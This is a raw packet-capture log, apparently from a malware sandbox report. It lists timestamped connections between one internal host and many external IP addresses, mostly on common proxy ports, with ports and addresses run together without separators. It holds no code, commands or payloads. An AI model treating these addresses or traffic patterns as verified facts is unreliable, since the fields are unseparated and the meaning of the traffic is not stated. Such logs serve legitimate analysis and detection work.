                                                                                                      Feb 23, 2024 09:45:17.168848038 CET8050086172.64.80.55192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.172739983 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.172779083 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.172835112 CET5009531602192.168.2.449.13.116.170
                                                                                                      Feb 23, 2024 09:45:17.172842026 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.172910929 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.172991991 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.172992945 CET5009531602192.168.2.449.13.116.170
                                                                                                      Feb 23, 2024 09:45:17.173110962 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.173161983 CET5009531602192.168.2.449.13.116.170
                                                                                                      Feb 23, 2024 09:45:17.173171043 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.173214912 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.173285007 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.173310995 CET5009531602192.168.2.449.13.116.170
                                                                                                      Feb 23, 2024 09:45:17.173350096 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.173393011 CET5009531602192.168.2.449.13.116.170
                                                                                                      Feb 23, 2024 09:45:17.173418999 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.173526049 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.173564911 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.173640966 CET5009531602192.168.2.449.13.116.170
                                                                                                      Feb 23, 2024 09:45:17.173677921 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.173733950 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.173758030 CET5009531602192.168.2.449.13.116.170
                                                                                                      Feb 23, 2024 09:45:17.173795938 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.173825979 CET805052250.218.57.74192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.173841953 CET5009531602192.168.2.449.13.116.170
                                                                                                      Feb 23, 2024 09:45:17.174612045 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.174683094 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.174727917 CET5009531602192.168.2.449.13.116.170
                                                                                                      Feb 23, 2024 09:45:17.174736977 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.174813032 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.174876928 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.174904108 CET5009531602192.168.2.449.13.116.170
                                                                                                      Feb 23, 2024 09:45:17.174942970 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.175025940 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.175028086 CET5009531602192.168.2.449.13.116.170
                                                                                                      Feb 23, 2024 09:45:17.175045013 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.175170898 CET5009531602192.168.2.449.13.116.170
                                                                                                      Feb 23, 2024 09:45:17.176642895 CET5056580192.168.2.4175.213.76.24
                                                                                                      Feb 23, 2024 09:45:17.177963018 CET5041550329148.72.212.252192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.177995920 CET5042932650192.168.2.441.217.220.69
                                                                                                      Feb 23, 2024 09:45:17.178006887 CET503623128192.168.2.4144.21.53.111
                                                                                                      Feb 23, 2024 09:45:17.178008080 CET5043358630192.168.2.451.81.186.179
                                                                                                      Feb 23, 2024 09:45:17.178009987 CET5044380192.168.2.4146.190.177.143
                                                                                                      Feb 23, 2024 09:45:17.178015947 CET4981480192.168.2.450.172.23.10
                                                                                                      Feb 23, 2024 09:45:17.178019047 CET504391287192.168.2.4174.141.233.168
                                                                                                      Feb 23, 2024 09:45:17.178245068 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.178349018 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.178412914 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.178437948 CET5009531602192.168.2.449.13.116.170
                                                                                                      Feb 23, 2024 09:45:17.178477049 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.178530931 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.178618908 CET5009531602192.168.2.449.13.116.170
                                                                                                      Feb 23, 2024 09:45:17.178622961 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.178709984 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.178782940 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.178806067 CET5009531602192.168.2.449.13.116.170
                                                                                                      Feb 23, 2024 09:45:17.178927898 CET5009531602192.168.2.449.13.116.170
                                                                                                      Feb 23, 2024 09:45:17.180532932 CET62275022572.10.160.171192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.180845022 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.180876970 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.180953026 CET5009531602192.168.2.449.13.116.170
                                                                                                      Feb 23, 2024 09:45:17.180964947 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.181319952 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.181412935 CET5009531602192.168.2.449.13.116.170
                                                                                                      Feb 23, 2024 09:45:17.181438923 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.181502104 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.181562901 CET5009531602192.168.2.449.13.116.170
                                                                                                      Feb 23, 2024 09:45:17.181581974 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.181654930 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.181823969 CET5009531602192.168.2.449.13.116.170
                                                                                                      Feb 23, 2024 09:45:17.183557034 CET3114750491209.121.164.50192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.185516119 CET5675550223162.214.102.195192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.187757015 CET6469350123208.87.131.151192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.188150883 CET41455051574.119.147.209192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.188283920 CET505154145192.168.2.474.119.147.209
                                                                                                      Feb 23, 2024 09:45:17.188745022 CET505154145192.168.2.474.119.147.209
                                                                                                      Feb 23, 2024 09:45:17.190445900 CET382050007198.12.253.1192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.190495014 CET382050007198.12.253.1192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.190593004 CET500073820192.168.2.4198.12.253.1
                                                                                                      Feb 23, 2024 09:45:17.190885067 CET500073820192.168.2.4198.12.253.1
                                                                                                      Feb 23, 2024 09:45:17.192405939 CET41455054124.249.199.4192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.192584038 CET41455054124.249.199.4192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.193619967 CET497361082192.168.2.4181.209.113.234
                                                                                                      Feb 23, 2024 09:45:17.193634987 CET5025180192.168.2.450.168.163.179
                                                                                                      Feb 23, 2024 09:45:17.193640947 CET498962589192.168.2.472.10.160.90
                                                                                                      Feb 23, 2024 09:45:17.193643093 CET500433128192.168.2.4185.105.230.45
                                                                                                      Feb 23, 2024 09:45:17.193691015 CET2943050068162.214.102.121192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.193720102 CET498218587192.168.2.4178.62.103.49
                                                                                                      Feb 23, 2024 09:45:17.193721056 CET5031544712192.168.2.492.204.135.4
                                                                                                      Feb 23, 2024 09:45:17.194478989 CET505664145192.168.2.424.249.199.4
                                                                                                      Feb 23, 2024 09:45:17.194849968 CET250855023772.10.164.178192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.195107937 CET8080500565.78.89.192192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.195169926 CET2658950549157.185.161.100192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.195312023 CET5054926589192.168.2.4157.185.161.100
                                                                                                      Feb 23, 2024 09:45:17.195597887 CET5054926589192.168.2.4157.185.161.100
                                                                                                      Feb 23, 2024 09:45:17.196357965 CET100114983467.43.227.227192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.202339888 CET3979650347141.94.174.6192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.204818964 CET505678080192.168.2.4190.187.201.26
                                                                                                      Feb 23, 2024 09:45:17.206351995 CET241950320109.205.181.27192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.206444979 CET503202419192.168.2.4109.205.181.27
                                                                                                      Feb 23, 2024 09:45:17.206692934 CET503202419192.168.2.4109.205.181.27
                                                                                                      Feb 23, 2024 09:45:17.207680941 CET567850342223.25.101.86192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.209230900 CET50250999192.168.2.4190.61.48.24
                                                                                                      Feb 23, 2024 09:45:17.209232092 CET499076095192.168.2.467.43.236.20
                                                                                                      Feb 23, 2024 09:45:17.209765911 CET1095850291132.148.154.97192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.211779118 CET10805048827.75.152.191192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.211811066 CET10805048827.75.152.191192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.213073969 CET414550475116.199.170.17192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.213486910 CET4802450020181.113.34.86192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.214194059 CET505681080192.168.2.427.75.152.191
                                                                                                      Feb 23, 2024 09:45:17.214747906 CET60055051487.106.114.124192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.215524912 CET5056980192.168.2.4104.20.125.124
                                                                                                      Feb 23, 2024 09:45:17.215547085 CET805053350.170.90.27192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.217717886 CET108050274202.162.219.12192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.219276905 CET505709292192.168.2.4177.54.229.0
                                                                                                      Feb 23, 2024 09:45:17.219851017 CET575204995841.242.90.3192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.221371889 CET31285020237.156.28.43192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.221621990 CET60055055087.106.114.124192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.221694946 CET505506005192.168.2.487.106.114.124
                                                                                                      Feb 23, 2024 09:45:17.222156048 CET414550537184.181.217.201192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.222184896 CET502023128192.168.2.437.156.28.43
                                                                                                      Feb 23, 2024 09:45:17.222187996 CET505506005192.168.2.487.106.114.124
                                                                                                      Feb 23, 2024 09:45:17.222528934 CET414550537184.181.217.201192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.223762989 CET505714145192.168.2.4184.181.217.201
                                                                                                      Feb 23, 2024 09:45:17.224534035 CET9995012145.229.34.174192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.224870920 CET4991826077192.168.2.472.10.160.92
                                                                                                      Feb 23, 2024 09:45:17.224873066 CET5009880192.168.2.4190.58.248.86
                                                                                                      Feb 23, 2024 09:45:17.225001097 CET108050538202.162.219.12192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.225420952 CET2005649818103.215.139.32192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.225512981 CET505381080192.168.2.4202.162.219.12
                                                                                                      Feb 23, 2024 09:45:17.226017952 CET414550321134.236.118.74192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.226373911 CET108015027672.10.164.178192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.226670027 CET567850006130.193.123.34192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.226896048 CET567850006130.193.123.34192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.229365110 CET500065678192.168.2.4130.193.123.34
                                                                                                      Feb 23, 2024 09:45:17.229547977 CET108205002588.255.217.44192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.231199980 CET1648950279162.210.192.135192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.235979080 CET805025650.174.145.13192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.239959002 CET567850492212.89.173.101192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.240525961 CET4991632650192.168.2.441.217.223.145
                                                                                                      Feb 23, 2024 09:45:17.240535021 CET4989145365192.168.2.4142.93.151.99
                                                                                                      Feb 23, 2024 09:45:17.240545988 CET504488080192.168.2.4103.125.154.233
                                                                                                      Feb 23, 2024 09:45:17.240547895 CET504504145192.168.2.472.210.252.137
                                                                                                      Feb 23, 2024 09:45:17.240551949 CET504518080192.168.2.4195.128.96.213
                                                                                                      Feb 23, 2024 09:45:17.240552902 CET5011480192.168.2.458.182.138.139
                                                                                                      Feb 23, 2024 09:45:17.240552902 CET501418080192.168.2.4190.19.114.104
                                                                                                      Feb 23, 2024 09:45:17.240576029 CET504453128192.168.2.435.189.183.169
                                                                                                      Feb 23, 2024 09:45:17.245230913 CET56785054289.161.90.203192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.245769978 CET56785054289.161.90.203192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.246047020 CET312850362144.21.53.111192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.247870922 CET503623128192.168.2.4144.21.53.111
                                                                                                      Feb 23, 2024 09:45:17.248181105 CET3501050072185.215.160.118192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.251269102 CET804985650.174.145.10192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.251413107 CET41455025998.170.57.231192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.251543045 CET41455025998.170.57.231192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.253132105 CET5905850030213.136.75.85192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.256104946 CET4990980192.168.2.450.170.90.25
                                                                                                      Feb 23, 2024 09:45:17.256127119 CET50447999192.168.2.445.231.221.193
                                                                                                      Feb 23, 2024 09:45:17.256139040 CET501823128192.168.2.494.142.142.140
                                                                                                      Feb 23, 2024 09:45:17.256226063 CET505381080192.168.2.4202.162.219.12
                                                                                                      Feb 23, 2024 09:45:17.256789923 CET522465002245.7.177.85192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.256911993 CET500065678192.168.2.4130.193.123.34
                                                                                                      Feb 23, 2024 09:45:17.257184029 CET63314987872.10.164.178192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.257356882 CET808050337103.172.1.35192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.257425070 CET29294987772.10.164.178192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.257584095 CET505725678192.168.2.4130.193.123.34
                                                                                                      Feb 23, 2024 09:45:17.258893013 CET505735678192.168.2.489.161.90.203
                                                                                                      Feb 23, 2024 09:45:17.259043932 CET804978396.114.36.9192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.259057045 CET804978396.114.36.9192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.259073973 CET804978396.114.36.9192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.259085894 CET804978396.114.36.9192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.259134054 CET4978380192.168.2.496.114.36.9
                                                                                                      Feb 23, 2024 09:45:17.259134054 CET4978380192.168.2.496.114.36.9
                                                                                                      Feb 23, 2024 09:45:17.259192944 CET804978396.114.36.9192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.259206057 CET804978396.114.36.9192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.259260893 CET804978396.114.36.9192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.259274960 CET804978396.114.36.9192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.259279966 CET4978380192.168.2.496.114.36.9
                                                                                                      Feb 23, 2024 09:45:17.259337902 CET4978380192.168.2.496.114.36.9
                                                                                                      Feb 23, 2024 09:45:17.259357929 CET804978396.114.36.9192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.259370089 CET804978396.114.36.9192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.259385109 CET804978396.114.36.9192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.259407043 CET4978380192.168.2.496.114.36.9
                                                                                                      Feb 23, 2024 09:45:17.259433985 CET804978396.114.36.9192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.259445906 CET804978396.114.36.9192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.259500027 CET4978380192.168.2.496.114.36.9
                                                                                                      Feb 23, 2024 09:45:17.259536028 CET804978396.114.36.9192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.259546995 CET804978396.114.36.9192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.259557009 CET804978396.114.36.9192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.259567976 CET312850160185.165.46.208192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.259579897 CET4978380192.168.2.496.114.36.9
                                                                                                      Feb 23, 2024 09:45:17.259732962 CET4978380192.168.2.496.114.36.9
                                                                                                      Feb 23, 2024 09:45:17.260674000 CET505744145192.168.2.498.170.57.231
                                                                                                      Feb 23, 2024 09:45:17.264718056 CET365465028970.32.26.23192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.271759987 CET5045655774192.168.2.451.210.4.123
                                                                                                      Feb 23, 2024 09:45:17.271759987 CET504573128192.168.2.4193.151.109.129
                                                                                                      Feb 23, 2024 09:45:17.271774054 CET504664145192.168.2.4103.105.40.241
                                                                                                      Feb 23, 2024 09:45:17.271774054 CET504548000192.168.2.414.103.24.20
                                                                                                      Feb 23, 2024 09:45:17.271800041 CET504594145192.168.2.491.185.236.239
                                                                                                      Feb 23, 2024 09:45:17.271831036 CET5053480192.168.2.462.99.138.162
                                                                                                      Feb 23, 2024 09:45:17.272352934 CET504528080192.168.2.4138.121.61.81
                                                                                                      Feb 23, 2024 09:45:17.272361994 CET504531080192.168.2.4188.255.245.33
                                                                                                      Feb 23, 2024 09:45:17.272377014 CET4994680192.168.2.450.174.214.218
                                                                                                      Feb 23, 2024 09:45:17.272377968 CET499445769192.168.2.467.43.227.228
                                                                                                      Feb 23, 2024 09:45:17.272377968 CET5045852903192.168.2.4203.161.32.242
                                                                                                      Feb 23, 2024 09:45:17.272377968 CET5046224606192.168.2.4161.97.170.209
                                                                                                      Feb 23, 2024 09:45:17.272378922 CET5046332650192.168.2.441.217.220.214
                                                                                                      Feb 23, 2024 09:45:17.272557974 CET500398080192.168.2.4195.206.39.222
                                                                                                      Feb 23, 2024 09:45:17.272557974 CET503452011192.168.2.467.43.228.253
                                                                                                      Feb 23, 2024 09:45:17.278968096 CET5025552420192.168.2.4162.214.102.121
                                                                                                      Feb 23, 2024 09:45:17.278992891 CET5030745314192.168.2.4104.238.100.115
                                                                                                      Feb 23, 2024 09:45:17.280797958 CET5057659179192.168.2.4162.243.55.12
                                                                                                      Feb 23, 2024 09:45:17.280978918 CET8050358203.222.24.36192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.281832933 CET900050546122.116.150.2192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.281936884 CET505469000192.168.2.4122.116.150.2
                                                                                                      Feb 23, 2024 09:45:17.281949997 CET808950350111.225.153.200192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.282514095 CET505469000192.168.2.4122.116.150.2
                                                                                                      Feb 23, 2024 09:45:17.284312963 CET5057780192.168.2.4104.16.207.86
                                                                                                      Feb 23, 2024 09:45:17.285660982 CET414550520199.102.107.145192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.285747051 CET505204145192.168.2.4199.102.107.145
                                                                                                      Feb 23, 2024 09:45:17.286015034 CET505204145192.168.2.4199.102.107.145
                                                                                                      Feb 23, 2024 09:45:17.287360907 CET504678080192.168.2.480.240.202.218
                                                                                                      Feb 23, 2024 09:45:17.287375927 CET504724153192.168.2.4103.165.64.86
                                                                                                      Feb 23, 2024 09:45:17.287400961 CET5046880192.168.2.4197.243.20.187
                                                                                                      Feb 23, 2024 09:45:17.287403107 CET5047346449192.168.2.494.232.11.178
                                                                                                      Feb 23, 2024 09:45:17.287404060 CET5047480192.168.2.413.209.156.241
                                                                                                      Feb 23, 2024 09:45:17.287410975 CET504708888192.168.2.4103.179.182.159
                                                                                                      Feb 23, 2024 09:45:17.287933111 CET447125031592.204.135.4192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.288846970 CET25894989672.10.160.90192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.289949894 CET5057880192.168.2.4172.67.53.215
                                                                                                      Feb 23, 2024 09:45:17.290283918 CET41455016568.71.247.130192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.292169094 CET8050442103.75.117.79192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.292889118 CET505791994192.168.2.445.173.12.141
                                                                                                      Feb 23, 2024 09:45:17.295336962 CET5058080192.168.2.420.78.102.191
                                                                                                      Feb 23, 2024 09:45:17.297605038 CET5058180192.168.2.4196.1.95.124
                                                                                                      Feb 23, 2024 09:45:17.298553944 CET4939750435172.93.111.87192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.298808098 CET5043549397192.168.2.4172.93.111.87
                                                                                                      Feb 23, 2024 09:45:17.299890041 CET111765040351.210.45.148192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.300029993 CET5040311176192.168.2.451.210.45.148
                                                                                                      Feb 23, 2024 09:45:17.300182104 CET414550475116.199.170.17192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.300313950 CET31284981513.234.24.116192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.300591946 CET5040311176192.168.2.451.210.45.148
                                                                                                      Feb 23, 2024 09:45:17.302362919 CET80805051965.21.188.18192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.302983046 CET504761080192.168.2.4139.180.140.254
                                                                                                      Feb 23, 2024 09:45:17.303014040 CET5047836076192.168.2.4109.123.254.43
                                                                                                      Feb 23, 2024 09:45:17.303021908 CET502465678192.168.2.4109.205.243.10
                                                                                                      Feb 23, 2024 09:45:17.303029060 CET8050569104.20.125.124192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.303102970 CET504793128192.168.2.420.118.133.34
                                                                                                      Feb 23, 2024 09:45:17.303102970 CET501538080192.168.2.4190.57.245.250
                                                                                                      Feb 23, 2024 09:45:17.303102970 CET504778080192.168.2.4122.52.196.36
                                                                                                      Feb 23, 2024 09:45:17.303195000 CET504828031192.168.2.4216.236.197.38
                                                                                                      Feb 23, 2024 09:45:17.303195000 CET500875089192.168.2.467.43.236.18
                                                                                                      Feb 23, 2024 09:45:17.303195953 CET5056980192.168.2.4104.20.125.124
                                                                                                      Feb 23, 2024 09:45:17.303195953 CET504808080192.168.2.4186.123.26.79
                                                                                                      Feb 23, 2024 09:45:17.303504944 CET2658950549157.185.161.100192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.303613901 CET5054926589192.168.2.4157.185.161.100
                                                                                                      Feb 23, 2024 09:45:17.303832054 CET5056980192.168.2.4104.20.125.124
                                                                                                      Feb 23, 2024 09:45:17.303847075 CET1047150543167.172.86.46192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.304060936 CET5054310471192.168.2.4167.172.86.46
                                                                                                      Feb 23, 2024 09:45:17.304378986 CET5054310471192.168.2.4167.172.86.46
                                                                                                      Feb 23, 2024 09:45:17.305598021 CET60954990767.43.236.20192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.305691004 CET999950300171.35.172.147192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.308979988 CET5058226439192.168.2.492.205.28.187
                                                                                                      Feb 23, 2024 09:45:17.310353041 CET20481505455.196.111.30192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.311283112 CET698450559162.214.170.144192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.311407089 CET505596984192.168.2.4162.214.170.144
                                                                                                      Feb 23, 2024 09:45:17.311839104 CET41455056172.210.208.101192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.311929941 CET505614145192.168.2.472.210.208.101
                                                                                                      Feb 23, 2024 09:45:17.311929941 CET505596984192.168.2.4162.214.170.144
                                                                                                      Feb 23, 2024 09:45:17.312338114 CET505614145192.168.2.472.210.208.101
                                                                                                      Feb 23, 2024 09:45:17.315951109 CET5058334090192.168.2.4195.30.84.218
                                                                                                      Feb 23, 2024 09:45:17.318641901 CET503014145192.168.2.4104.200.135.46
                                                                                                      Feb 23, 2024 09:45:17.318660021 CET503054145192.168.2.4199.102.106.94
                                                                                                      Feb 23, 2024 09:45:17.318660975 CET504841080192.168.2.4213.5.197.61
                                                                                                      Feb 23, 2024 09:45:17.318660975 CET504874145192.168.2.461.247.25.231
                                                                                                      Feb 23, 2024 09:45:17.318664074 CET504858085192.168.2.4103.153.63.211
                                                                                                      Feb 23, 2024 09:45:17.318667889 CET5048660870192.168.2.4141.94.174.6
                                                                                                      Feb 23, 2024 09:45:17.318677902 CET5052780192.168.2.4113.252.40.144
                                                                                                      Feb 23, 2024 09:45:17.318681955 CET504904153192.168.2.445.233.2.1
                                                                                                      Feb 23, 2024 09:45:17.318682909 CET5021080192.168.2.450.231.104.58
                                                                                                      Feb 23, 2024 09:45:17.318682909 CET5048912922192.168.2.4209.216.90.208
                                                                                                      Feb 23, 2024 09:45:17.319744110 CET260774991872.10.160.92192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.320000887 CET5058435087192.168.2.4162.240.10.35
                                                                                                      Feb 23, 2024 09:45:17.320301056 CET414550562142.54.236.97192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.322663069 CET414550328174.77.111.196192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.322720051 CET414550328174.77.111.196192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.322940111 CET805011350.204.219.224192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.324392080 CET505854145192.168.2.4174.77.111.196
                                                                                                      Feb 23, 2024 09:45:17.324755907 CET805025150.168.163.179192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.327334881 CET312850160185.165.46.208192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.327351093 CET312850160185.165.46.208192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.327389002 CET312850160185.165.46.208192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.327403069 CET312850160185.165.46.208192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.327431917 CET501603128192.168.2.4185.165.46.208
                                                                                                      Feb 23, 2024 09:45:17.327457905 CET312850160185.165.46.208192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.327471972 CET312850160185.165.46.208192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.327487946 CET501603128192.168.2.4185.165.46.208
                                                                                                      Feb 23, 2024 09:45:17.327528954 CET501603128192.168.2.4185.165.46.208
                                                                                                      Feb 23, 2024 09:45:17.327641010 CET312850160185.165.46.208192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.327704906 CET312850160185.165.46.208192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.327783108 CET312850160185.165.46.208192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.327796936 CET312850160185.165.46.208192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.327809095 CET501603128192.168.2.4185.165.46.208
                                                                                                      Feb 23, 2024 09:45:17.327832937 CET501603128192.168.2.4185.165.46.208
                                                                                                      Feb 23, 2024 09:45:17.328339100 CET8050396106.14.255.124192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.328694105 CET805035513.229.47.109192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.329816103 CET808050112186.192.195.211192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.333056927 CET804981450.172.23.10192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.333662033 CET382050007198.12.253.1192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.334232092 CET503972955192.168.2.472.10.160.172
                                                                                                      Feb 23, 2024 09:45:17.334233999 CET5052880192.168.2.413.81.217.201
                                                                                                      Feb 23, 2024 09:45:17.334264994 CET499935678192.168.2.4125.26.22.7
                                                                                                      Feb 23, 2024 09:45:17.334930897 CET3586050411212.3.112.128192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.335063934 CET5041135860192.168.2.4212.3.112.128
                                                                                                      Feb 23, 2024 09:45:17.335464954 CET5041135860192.168.2.4212.3.112.128
                                                                                                      Feb 23, 2024 09:45:17.336703062 CET31285024083.219.145.106192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.337604046 CET41455051574.119.147.209192.168.2.4
                                                                                                      Feb 23, 2024 09:45:17.337665081 CET41455051574.119.147.209192.168.2.4
